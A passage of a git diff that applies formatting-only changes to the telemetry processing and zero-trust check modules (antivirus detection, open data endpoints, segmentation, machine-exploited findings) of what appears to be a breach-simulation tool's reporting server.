@@ -40,19 +54,16 @@ class SystemInfoTelemetryDispatcher(object): self.dispatch_single_result_to_relevant_processor(telemetry_json) def dispatch_single_result_to_relevant_processor(self, telemetry_json): - relevant_monkey_guid = telemetry_json['monkey_guid'] + relevant_monkey_guid = telemetry_json["monkey_guid"] for collector_name, collector_results in telemetry_json["data"]["collectors"].items(): self.dispatch_result_of_single_collector_to_processing_functions( - collector_name, - collector_results, - relevant_monkey_guid) + collector_name, collector_results, relevant_monkey_guid + ) def dispatch_result_of_single_collector_to_processing_functions( - self, - collector_name, - collector_results, - relevant_monkey_guid): + self, collector_name, collector_results, relevant_monkey_guid + ): if collector_name in self.collector_to_processing_functions: for processing_function in self.collector_to_processing_functions[collector_name]: # noinspection PyBroadException @@ -60,7 +71,10 @@ class SystemInfoTelemetryDispatcher(object): processing_function(collector_results, relevant_monkey_guid) except Exception as e: logger.error( - "Error {} while processing {} system info telemetry".format(str(e), collector_name), - exc_info=True) + "Error {} while processing {} system info telemetry".format( + str(e), collector_name + ), + exc_info=True, + ) else: logger.warning("Unknown system info collector name: {}".format(collector_name)) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py index 6369ea9e1..f1e53d5f4 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py @@ -1,8 +1,9 @@ import uuid from monkey_island.cc.models import Monkey -from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import \ - SystemInfoTelemetryDispatcher +from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import ( + SystemInfoTelemetryDispatcher, +) class TestEnvironmentTelemetryProcessing: @@ -20,7 +21,7 @@ class TestEnvironmentTelemetryProcessing: "EnvironmentCollector": {"environment": on_premise}, } }, - "monkey_guid": monkey_guid + "monkey_guid": monkey_guid, } dispatcher.dispatch_collector_results_to_relevant_processors(telem_json) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py index eed93058a..0335c6e65 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py @@ -4,7 +4,9 @@ import pytest from monkey_island.cc.models import Monkey from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import ( - SystemInfoTelemetryDispatcher, process_aws_telemetry) + SystemInfoTelemetryDispatcher, + process_aws_telemetry, +) TEST_SYS_INFO_TO_PROCESSING = { "AwsCollector": [process_aws_telemetry], @@ -31,7 +33,10 @@ class TestSystemInfoTelemetryDispatcher: # Telem JSON with no 
collectors - nothing gets dispatched good_telem_no_collectors = {"monkey_guid": "bla", "data": {"bla": "bla"}} - good_telem_empty_collectors = {"monkey_guid": "bla", "data": {"bla": "bla", "collectors": {}}} + good_telem_empty_collectors = { + "monkey_guid": "bla", + "data": {"bla": "bla", "collectors": {}}, + } dispatcher.dispatch_collector_results_to_relevant_processors(good_telem_no_collectors) dispatcher.dispatch_collector_results_to_relevant_processors(good_telem_empty_collectors) @@ -50,7 +55,7 @@ class TestSystemInfoTelemetryDispatcher: "AwsCollector": {"instance_id": instance_id}, } }, - "monkey_guid": a_monkey.guid + "monkey_guid": a_monkey.guid, } dispatcher.dispatch_collector_results_to_relevant_processors(telem_json) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py index 0999e285e..882339119 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py @@ -4,75 +4,67 @@ import monkey_island.cc.services.telemetry.processing.post_breach as post_breach from .post_breach import EXECUTION_WITHOUT_OUTPUT -original_telem_multiple_results =\ - { - 'data': { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': [ - ['SUCCESSFUL', True], - ['UNSUCCESFUL', False], - ['', True] - ] +original_telem_multiple_results = { + "data": { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": [["SUCCESSFUL", True], ["UNSUCCESFUL", False], ["", True]], + }, + "telem_category": "post_breach", +} + +expected_telem_multiple_results = { + "data": [ + { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": ["SUCCESSFUL", True], }, - 'telem_category': 'post_breach' - } - -expected_telem_multiple_results =\ - { - 'data': [ - { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': ['SUCCESSFUL', True] - }, - { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': ['UNSUCCESFUL', False] - }, - { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': [EXECUTION_WITHOUT_OUTPUT, True] - } - ], - 'telem_category': 'post_breach' - } - -original_telem_single_result =\ - { - 'data': { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': ['', True] + { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": ["UNSUCCESFUL", False], }, - 'telem_category': 'post_breach' - } + { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": [EXECUTION_WITHOUT_OUTPUT, True], + }, + ], + "telem_category": "post_breach", +} -expected_telem_single_result =\ - { - 'data': [ - { - 'command': 'COMMAND', - 'hostname': 'HOST', - 'ip': '127.0.1.1', - 'name': 'PBA NAME', - 'result': [EXECUTION_WITHOUT_OUTPUT, True] - }, - ], - 'telem_category': 'post_breach' - } +original_telem_single_result = { + "data": { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": ["", True], + }, + "telem_category": "post_breach", +} + +expected_telem_single_result = { + "data": [ + { + "command": "COMMAND", + "hostname": "HOST", + "ip": "127.0.1.1", + "name": "PBA NAME", + "result": 
[EXECUTION_WITHOUT_OUTPUT, True], + }, + ], + "telem_category": "post_breach", +} def test_process_post_breach_telemetry(): diff --git a/monkey/monkey_island/cc/services/telemetry/processing/tunnel.py b/monkey/monkey_island/cc/services/telemetry/processing/tunnel.py index 1e20e5443..4464eb82a 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/tunnel.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/tunnel.py @@ -1,12 +1,14 @@ from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field -from monkey_island.cc.services.telemetry.zero_trust_checks.tunneling import check_tunneling_violation +from monkey_island.cc.services.telemetry.zero_trust_checks.tunneling import ( + check_tunneling_violation, +) def process_tunnel_telemetry(telemetry_json): check_tunneling_violation(telemetry_json) - monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])["_id"] - if telemetry_json['data']['proxy'] is not None: + monkey_id = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"])["_id"] + if telemetry_json["data"]["proxy"] is not None: tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(telemetry_json) NodeService.set_monkey_tunnel(monkey_id, tunnel_host_ip) else: diff --git a/monkey/monkey_island/cc/services/telemetry/processing/utils.py b/monkey/monkey_island/cc/services/telemetry/processing/utils.py index df898945e..ffa6960f6 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/utils.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/utils.py @@ -3,9 +3,9 @@ from monkey_island.cc.services.node import NodeService def get_edge_by_scan_or_exploit_telemetry(telemetry_json): - dst_ip = telemetry_json['data']['machine']['ip_addr'] - dst_domain_name = telemetry_json['data']['machine']['domain_name'] - src_monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']) + dst_ip = telemetry_json["data"]["machine"]["ip_addr"] + dst_domain_name = telemetry_json["data"]["machine"]["domain_name"] + src_monkey = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"]) dst_node = NodeService.get_monkey_by_ip(dst_ip) if dst_node is None: dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name) @@ -17,5 +17,5 @@ def get_edge_by_scan_or_exploit_telemetry(telemetry_json): def get_tunnel_host_ip_from_proxy_field(telemetry_json): - tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "") + tunnel_host_ip = telemetry_json["data"]["proxy"].split(":")[-2].replace("//", "") return tunnel_host_ip diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py index a6b90cc45..d2f154a9e 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py @@ -3,8 +3,12 @@ import json import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.telemetry.zero_trust_checks.known_anti_viruses import ANTI_VIRUS_KNOWN_PROCESS_NAMES -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.telemetry.zero_trust_checks.known_anti_viruses import ( + 
ANTI_VIRUS_KNOWN_PROCESS_NAMES, +) +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) def check_antivirus_existence(process_list_json, monkey_guid): @@ -13,33 +17,39 @@ def check_antivirus_existence(process_list_json, monkey_guid): process_list_event = Event.create_event( title="Process list", message="Monkey on {} scanned the process list".format(current_monkey.hostname), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL, + ) events = [process_list_event] av_processes = filter_av_processes(process_list_json["process_list"]) for process in av_processes: - events.append(Event.create_event( - title="Found AV process", - message="The process '{}' was recognized as an Anti Virus process. Process " - "details: {}".format(process[1]['name'], json.dumps(process[1])), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL - )) + events.append( + Event.create_event( + title="Found AV process", + message="The process '{}' was recognized as an Anti Virus process. Process " + "details: {}".format(process[1]["name"], json.dumps(process[1])), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL, + ) + ) if len(av_processes) > 0: test_status = zero_trust_consts.STATUS_PASSED else: test_status = zero_trust_consts.STATUS_FAILED - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - status=test_status, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events + ) def filter_av_processes(process_list): all_processes = list(process_list.items()) av_processes = [] for process in all_processes: - process_name = process[1]['name'] + process_name = process[1]["name"] # This is for case-insensitive `in`. Generator expression is to save memory. - if process_name.upper() in (known_av_name.upper() for known_av_name in ANTI_VIRUS_KNOWN_PROCESS_NAMES): + if process_name.upper() in ( + known_av_name.upper() for known_av_name in ANTI_VIRUS_KNOWN_PROCESS_NAMES + ): av_processes.append(process) return av_processes diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py index 2ef914786..74007b5fd 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py @@ -1,34 +1,43 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) COMM_AS_NEW_USER_FAILED_FORMAT = "Monkey on {} couldn't communicate as new user. Details: {}" -COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \ - "New user created by Monkey on {} successfully tried to communicate with the internet. Details: {}" +COMM_AS_NEW_USER_SUCCEEDED_FORMAT = "New user created by Monkey on {} successfully tried to communicate with the internet. 
Details: {}" def check_new_user_communication(current_monkey, success, message): status = zero_trust_consts.STATUS_FAILED if success else zero_trust_consts.STATUS_PASSED - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, - status=status, - events=[ - get_attempt_event(current_monkey), - get_result_event(current_monkey, message, success) - ]) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, + status=status, + events=[ + get_attempt_event(current_monkey), + get_result_event(current_monkey, message, success), + ], + ) def get_attempt_event(current_monkey): tried_to_communicate_event = Event.create_event( title="Communicate as new user", - message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + message="Monkey on {} tried to create a new user and communicate from it.".format( + current_monkey.hostname + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) return tried_to_communicate_event def get_result_event(current_monkey, message, success): - message_format = COMM_AS_NEW_USER_SUCCEEDED_FORMAT if success else COMM_AS_NEW_USER_FAILED_FORMAT + message_format = ( + COMM_AS_NEW_USER_SUCCEEDED_FORMAT if success else COMM_AS_NEW_USER_FAILED_FORMAT + ) return Event.create_event( title="Communicate as new user", message=message_format.format(current_monkey.hostname, message), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py index 2ecd42b52..e4accdff7 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py @@ -4,15 +4,17 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from common.common_consts.network_consts import ES_SERVICE from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) -HTTP_SERVERS_SERVICES_NAMES = ['tcp-80'] -POSTGRESQL_SERVER_SERVICE_NAME = 'PostgreSQL' +HTTP_SERVERS_SERVICES_NAMES = ["tcp-80"] +POSTGRESQL_SERVER_SERVICE_NAME = "PostgreSQL" def check_open_data_endpoints(telemetry_json): services = telemetry_json["data"]["machine"]["services"] - current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) + current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]) found_http_server_status = zero_trust_consts.STATUS_PASSED found_elastic_search_server = zero_trust_consts.STATUS_PASSED found_postgresql_server = zero_trust_consts.STATUS_PASSED @@ -21,60 +23,77 @@ def check_open_data_endpoints(telemetry_json): Event.create_event( title="Scan Telemetry", message="Monkey on {} tried to perform a network scan, the target was {}.".format( - current_monkey.hostname, - telemetry_json["data"]["machine"]["ip_addr"]), + current_monkey.hostname, telemetry_json["data"]["machine"]["ip_addr"] + ), event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, - 
timestamp=telemetry_json["timestamp"] + timestamp=telemetry_json["timestamp"], ) ] for service_name, service_data in list(services.items()): - events.append(Event.create_event( - title="Scan telemetry analysis", - message="Scanned service: {}.".format(service_name), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK - )) + events.append( + Event.create_event( + title="Scan telemetry analysis", + message="Scanned service: {}.".format(service_name), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ) if service_name in HTTP_SERVERS_SERVICES_NAMES: found_http_server_status = zero_trust_consts.STATUS_FAILED - events.append(Event.create_event( - title="Scan telemetry analysis", - message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( - service_data["display_name"], - telemetry_json["data"]["machine"]["ip_addr"], - json.dumps(service_data) - ), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK - )) + events.append( + Event.create_event( + title="Scan telemetry analysis", + message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( + service_data["display_name"], + telemetry_json["data"]["machine"]["ip_addr"], + json.dumps(service_data), + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ) if service_name == ES_SERVICE: found_elastic_search_server = zero_trust_consts.STATUS_FAILED - events.append(Event.create_event( - title="Scan telemetry analysis", - message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( - service_data["display_name"], - telemetry_json["data"]["machine"]["ip_addr"], - json.dumps(service_data) - ), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK - )) + events.append( + Event.create_event( + title="Scan telemetry analysis", + message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( + service_data["display_name"], + telemetry_json["data"]["machine"]["ip_addr"], + json.dumps(service_data), + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ) if service_name == POSTGRESQL_SERVER_SERVICE_NAME: found_postgresql_server = zero_trust_consts.STATUS_FAILED - events.append(Event.create_event( - title="Scan telemetry analysis", - message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( - service_data["display_name"], - telemetry_json["data"]["machine"]["ip_addr"], - json.dumps(service_data) - ), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK - )) + events.append( + Event.create_event( + title="Scan telemetry analysis", + message="Service {} on {} recognized as an open data endpoint! 
Service details: {}".format( + service_data["display_name"], + telemetry_json["data"]["machine"]["ip_addr"], + json.dumps(service_data), + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ) - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, - status=found_http_server_status, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, + status=found_http_server_status, + events=events, + ) - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC, - status=found_elastic_search_server, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC, + status=found_elastic_search_server, + events=events, + ) - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_DATA_ENDPOINT_POSTGRESQL, - status=found_postgresql_server, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_DATA_ENDPOINT_POSTGRESQL, + status=found_postgresql_server, + events=events, + ) MonkeyZTFindingService.add_malicious_activity_to_timeline(events) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/known_anti_viruses.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/known_anti_viruses.py index 291348467..2a5c45613 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/known_anti_viruses.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/known_anti_viruses.py @@ -83,5 +83,5 @@ ANTI_VIRUS_KNOWN_PROCESS_NAMES = [ "gc-fastpath.exe", "gc-enforcement-channel.exe", "gc-enforcement-agent.exe", - "gc-agent-ui.exe" + "gc-agent-ui.exe", ] diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py index d6813259c..9bf0f5de6 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py @@ -1,6 +1,8 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) def check_machine_exploited(current_monkey, exploit_successful, exploiter, target_ip, timestamp): @@ -8,11 +10,10 @@ def check_machine_exploited(current_monkey, exploit_successful, exploiter, targe Event.create_event( title="Exploit attempt", message="Monkey on {} attempted to exploit {} using {}.".format( - current_monkey.hostname, - target_ip, - exploiter), + current_monkey.hostname, target_ip, exploiter + ), event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, - timestamp=timestamp + timestamp=timestamp, ) ] status = zero_trust_consts.STATUS_PASSED @@ -21,15 +22,16 @@ def check_machine_exploited(current_monkey, exploit_successful, exploiter, targe Event.create_event( title="Exploit success!", message="Monkey on {} successfully exploited {} using {}.".format( - current_monkey.hostname, - target_ip, - exploiter), + current_monkey.hostname, target_ip, exploiter + ), event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, - timestamp=timestamp) + timestamp=timestamp, + ) ) status = 
zero_trust_consts.STATUS_FAILED - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, - events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, events=events + ) MonkeyZTFindingService.add_malicious_activity_to_timeline(events) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py index d5a56b36d..acc3e6bfa 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py @@ -5,15 +5,22 @@ from common.network.network_range import NetworkRange from common.network.segmentation_utils import get_ip_if_in_subnet, get_ip_in_src_and_not_in_dst from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.configuration.utils import ( + get_config_network_segments_as_subnet_groups, +) +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) -SEGMENTATION_DONE_EVENT_TEXT = "Monkey on {hostname} is done attempting cross-segment communications " \ - "from `{src_seg}` segments to `{dst_seg}` segments." +SEGMENTATION_DONE_EVENT_TEXT = ( + "Monkey on {hostname} is done attempting cross-segment communications " + "from `{src_seg}` segments to `{dst_seg}` segments." +) -SEGMENTATION_VIOLATION_EVENT_TEXT = \ - "Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) " \ +SEGMENTATION_VIOLATION_EVENT_TEXT = ( + "Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) " "managed to communicate cross segment to {target_ip} (in segment {target_seg})." +) def check_segmentation_violation(current_monkey, target_ip): @@ -25,15 +32,19 @@ def check_segmentation_violation(current_monkey, target_ip): source_subnet = subnet_pair[0] target_subnet = subnet_pair[1] if is_segmentation_violation(current_monkey, target_ip, source_subnet, target_subnet): - event = get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet) + event = get_segmentation_violation_event( + current_monkey, source_subnet, target_ip, target_subnet + ) MonkeyZTFindingService.create_or_add_to_existing( test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, - events=[event] + events=[event], ) -def is_segmentation_violation(current_monkey: Monkey, target_ip: str, source_subnet: str, target_subnet: str) -> bool: +def is_segmentation_violation( + current_monkey: Monkey, target_ip: str, source_subnet: str, target_subnet: str +) -> bool: """ Checks is a specific communication is a segmentation violation. :param current_monkey: The source monkey which originated the communication. 
@@ -49,9 +60,8 @@ def is_segmentation_violation(current_monkey: Monkey, target_ip: str, source_sub if target_subnet_range.is_in_range(str(target_ip)): cross_segment_ip = get_ip_in_src_and_not_in_dst( - current_monkey.ip_addresses, - source_subnet_range, - target_subnet_range) + current_monkey.ip_addresses, source_subnet_range, target_subnet_range + ) return cross_segment_ip is not None @@ -61,17 +71,21 @@ def get_segmentation_violation_event(current_monkey, source_subnet, target_ip, t title="Segmentation event", message=SEGMENTATION_VIOLATION_EVENT_TEXT.format( hostname=current_monkey.hostname, - source_ip=get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(source_subnet)), + source_ip=get_ip_if_in_subnet( + current_monkey.ip_addresses, NetworkRange.get_range_obj(source_subnet) + ), source_seg=source_subnet, target_ip=target_ip, - target_seg=target_subnet + target_seg=target_subnet, ), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, ) def check_passed_findings_for_unreached_segments(current_monkey): - flat_all_subnets = [item for sublist in get_config_network_segments_as_subnet_groups() for item in sublist] + flat_all_subnets = [ + item for sublist in get_config_network_segments_as_subnet_groups() for item in sublist + ] create_or_add_findings_for_all_pairs(flat_all_subnets, current_monkey) @@ -79,7 +93,10 @@ def create_or_add_findings_for_all_pairs(all_subnets, current_monkey): # Filter the subnets that this monkey is part of. this_monkey_subnets = [] for subnet in all_subnets: - if get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(subnet)) is not None: + if ( + get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(subnet)) + is not None + ): this_monkey_subnets.append(subnet) # Get all the other subnets. 
@@ -93,7 +110,7 @@ def create_or_add_findings_for_all_pairs(all_subnets, current_monkey): MonkeyZTFindingService.create_or_add_to_existing( status=zero_trust_consts.STATUS_PASSED, events=[get_segmentation_done_event(current_monkey, subnet_pair)], - test=zero_trust_consts.TEST_SEGMENTATION + test=zero_trust_consts.TEST_SEGMENTATION, ) @@ -101,8 +118,7 @@ def get_segmentation_done_event(current_monkey, subnet_pair): return Event.create_event( title="Segmentation test done", message=SEGMENTATION_DONE_EVENT_TEXT.format( - hostname=current_monkey.hostname, - src_seg=subnet_pair[0], - dst_seg=subnet_pair[1]), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK + hostname=current_monkey.hostname, src_seg=subnet_pair[0], dst_seg=subnet_pair[1] + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py index ca58549d1..aa67a5175 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py @@ -4,8 +4,12 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding -from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import create_or_add_findings_for_all_pairs -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import ( + create_or_add_findings_for_all_pairs, +) +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) FIRST_SUBNET = "1.1.1.1" SECOND_SUBNET = "2.2.2.0/24" @@ -13,13 +17,10 @@ THIRD_SUBNET = "3.3.3.3-3.3.3.200" class TestSegmentationChecks: - def test_create_findings_for_all_done_pairs(self): all_subnets = [FIRST_SUBNET, SECOND_SUBNET, THIRD_SUBNET] - monkey = Monkey( - guid=str(uuid.uuid4()), - ip_addresses=[FIRST_SUBNET]) + monkey = Monkey(guid=str(uuid.uuid4()), ip_addresses=[FIRST_SUBNET]) # no findings assert len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 0 @@ -28,8 +29,9 @@ class TestSegmentationChecks: create_or_add_findings_for_all_pairs(all_subnets, monkey) # There are 2 subnets in which the monkey is NOT - zt_seg_findings = Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, - status=zero_trust_consts.STATUS_PASSED) + zt_seg_findings = Finding.objects( + test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED + ) # Assert that there's only one finding with multiple events (one for each subnet) assert len(zt_seg_findings) == 1 @@ -39,17 +41,23 @@ class TestSegmentationChecks: MonkeyZTFindingService.create_or_add_to_existing( status=zero_trust_consts.STATUS_FAILED, test=zero_trust_consts.TEST_SEGMENTATION, - events=[Event.create_event(title="sdf", - message="asd", - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)] + events=[ + Event.create_event( + title="sdf", + message="asd", + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ], ) - zt_seg_findings = Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, - 